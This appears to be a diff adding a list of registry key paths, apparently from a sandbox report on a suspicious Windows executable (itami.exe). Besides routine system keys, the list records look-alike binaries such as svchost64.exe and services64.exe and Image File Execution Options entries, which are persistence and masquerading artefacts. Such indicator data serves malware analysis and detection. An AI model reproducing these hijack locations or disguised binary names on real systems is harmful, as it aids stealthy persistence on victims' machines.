+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Dynamic__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Dynamic__b03f5f7f11d50a3a",
+    "HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\Environment\\__PSLockdownPolicy",
+    "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds",
+    "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\PipelineMaxStackSizeMB",
+    "HKLM\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.6.1.Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.6.1.Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.1.0.System.Management.Automation__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.1.0.System.Management.Automation__31bf3856ad364e35\\4",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.1.0.System.Management.Automation__31bf3856ad364e35\\1",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.1.0.System.Management.Automation__31bf3856ad364e35\\1\\1.0.0.0",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.1.0.System.Management.Automation__31bf3856ad364e35\\1\\1.0.0.0\\ConfigFilePath",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.1.0.System.Management.Automation__31bf3856ad364e35\\1\\1.0.0.0\\12",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.1.0.System.Management.Automation__31bf3856ad364e35\\1\\1.0.0.0\\12\\ConfigFilePath",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.1.0.System.Management.Automation__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.6.1.Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.6.1.Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.6.1.Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.6.1.Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.6.1.Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.6.1.Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.6.1.Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.6.1.Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.3.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.3.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.ServiceProcess__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.ServiceProcess__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Windows.Forms__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.3.0.Microsoft.WSMan.Management__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.3.0.Microsoft.WSMan.Management__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Drawing__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Web.Services__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Web.Services__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.1.0.Microsoft.BackgroundIntelligentTransfer.Management__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.1.0.Microsoft.BackgroundIntelligentTransfer.Management__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.6.1.Microsoft.BackgroundIntelligentTransfer.Management.Interop__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.6.1.Microsoft.BackgroundIntelligentTransfer.Management.Interop__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.3.0.Microsoft.PowerShell.LocalAccounts__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.3.0.Microsoft.PowerShell.LocalAccounts__31bf3856ad364e35",
+    "HKLM\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
+    "HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001",
+    "HKLM\\Software\\Policies",
+    "HKCU\\Software",
+    "HKLM\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
+    "HKLM\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FrameTabWindow",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FrameMerging",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\SessionMerging",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\AdminTabProcs",
+    "HKLM\\Software\\Policies\\Microsoft\\Internet Explorer\\Main",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\TabProcGrowth",
+    "HKLM\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
+    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
+    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
+    "HKLM\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
+    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562",
+    "HKLM\\Software\\Policies\\Microsoft\\Internet Explorer",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Security",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck",
+    "HKLM\\System\\Setup",
+    "HKLM\\System\\Setup\\SystemSetupInProgress",
+    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones",
+    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0",
+    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1",
+    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2",
+    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3",
+    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000",
+    "HKLM\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SpecialFoldersCacheSize",
+    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SpecialFoldersCacheSize",
+    "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.6.1.Microsoft.Windows.Diagnosis.TroubleshootingPack__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.6.1.Microsoft.Windows.Diagnosis.TroubleshootingPack__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.6.1.Microsoft.Windows.Diagnosis.SDEngine__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.6.1.Microsoft.Windows.Diagnosis.SDEngine__31bf3856ad364e35",
+    "HKCR\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InprocServer32",
+    "HKCR\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InprocServer32\\0x0",
+    "HKLM\\SOFTWARE\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InprocServer32",
+    "HKLM\\SOFTWARE\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InprocServer32\\0x0",
+    "HKCR\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\Server",
+    "HKCR\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\Server\\0x0",
+    "HKLM\\SOFTWARE\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\Server",
+    "HKLM\\SOFTWARE\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\Server\\0x0",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.1.0.Microsoft.Management.Infrastructure__31bf3856ad364e35\\Policy\\Standards",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-3711686801-687107597-1149503783-1001\\Installer\\Assemblies\\C:|Users|admin|Downloads|itami.exe",
+    "HKCU\\Software\\Microsoft\\Installer\\Assemblies\\C:|Users|admin|Downloads|itami.exe",
+    "HKLM\\SOFTWARE\\Classes\\Installer\\Assemblies\\C:|Users|admin|Downloads|itami.exe",
+    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KindMap",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610",
+    "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_PROTOCOL_LOCKDOWN",
+    "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\svchost64.exe",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.IO.Compression__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.IO.Compression__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\PropertySystem\\PropertyHandlers\\.exe",
+    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\PropertySystem\\PropertyHandlers\\.exe\\0x0",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\Microsoft\\Internet Explorer\\Security",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell\\Microsoft\\Internet Explorer\\Security",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck",
+    "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\services64.exe",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-3711686801-687107597-1149503783-1001\\Installer\\Assemblies\\C:|Windows|system32|services64.exe",
+    "HKCU\\Software\\Microsoft\\Installer\\Assemblies\\C:|Windows|system32|services64.exe",
+    "HKLM\\SOFTWARE\\Classes\\Installer\\Assemblies\\C:|Windows|system32|services64.exe",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-3711686801-687107597-1149503783-1001\\Installer\\Assemblies\\C:|Users|admin|AppData|Local|Temp|svchost64.exe",
+    "HKCU\\Software\\Microsoft\\Installer\\Assemblies\\C:|Users|admin|AppData|Local|Temp|svchost64.exe",
+    "HKLM\\SOFTWARE\\Classes\\Installer\\Assemblies\\C:|Users|admin|AppData|Local|Temp|svchost64.exe",
+    "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion",
+    "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\InstallationType",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\HWRPortReuseOnSocketBind",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\UseHttpPipeliningAndBufferPooling",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseSafeSynchronousClose",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\UseSafeSynchronousClose",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\UseStrictRfcInterimResponseHandling",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowDangerousUnicodeDecompositions",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\AllowDangerousUnicodeDecompositions",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.UseStrictIPv6AddressParsing",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\UseStrictIPv6AddressParsing",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowAllUriEncodingExpansion",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\AllowAllUriEncodingExpansion",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\SchUseStrongCrypto",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\SchSendAuxRecord",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\SystemDefaultTlsVersions",
+    "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sihost64.exe",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.RequireCertificateEKUs",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\RequireCertificateEKUs",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\WMIDisableCOMSecurity",
+    "HKCR\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32",
+    "HKCR\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\0x0",
+    "HKLM\\SOFTWARE\\Classes\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32",
+    "HKLM\\SOFTWARE\\Classes\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\0x0",
+    "HKCR\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\InprocServer32",
+    "HKCR\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\InprocServer32\\0x0",
+    "HKLM\\SOFTWARE\\Classes\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\InprocServer32",
+    "HKLM\\SOFTWARE\\Classes\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\InprocServer32\\0x0",
+    "HKLM\\Software\\Microsoft\\WBEM\\CIMOM",
+    "HKLM\\Software\\Microsoft\\WBEM\\CIMOM\\ProcessID",
+    "HKLM\\Software\\Microsoft\\WBEM\\CIMOM\\EnablePrivateObjectHeap",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\.NETFramework",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Fusion",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Installer\\Assemblies\\C:|Users|user|Desktop|itami.exe",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Installer\\Assemblies\\C:|Windows|system32|services64.exe",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Installer\\Assemblies\\Global",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Security",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\CA",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\CA\\CRLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\CA\\CTLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\CA\\Certificates",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Disallowed",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Root",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Root\\CRLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Root\\CTLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Root\\Certificates",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot\\CRLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot\\CTLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot\\Certificates",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\TrustedPeople",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\TrustedPeople\\CRLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\TrustedPeople\\CTLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\TrustedPeople\\Certificates",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\trust",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\trust\\CRLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\trust\\CTLs",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\trust\\Certificates",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{2F6CE85C-F9EE-43CA-90C7-8A9BD53A2467}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{5B934B42-522B-4C34-BBFE-37A3EF7B9C90}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{64693913-1C21-4F30-A98F-4E52906D3B56}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{98F275B4-4FFF-11E0-89E2-7B86DFD72085}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{A00EE528-EBD9-48B8-944A-8942113D46AC}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{EDC978D6-4D53-4B2F-A265-5805674BE568}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{F8278C54-A712-415B-B593-B77A2BE0DDA9}\\ShellFolder",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\NULL",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{15734c0b-4aaa-4cbe-ad75-3e504f42acb3}\\",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3882a871-858a-11eb-b9e1-806e6f6e6963}\\",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3ad3197b-12d6-45c2-a036-8dbcc38b1f2e}\\",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{fde94e26-51ac-4a3b-a031-293cbf326422}\\",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\RemovableDrives",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\RemovableDrives\\DelegateFolders",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\NULL",
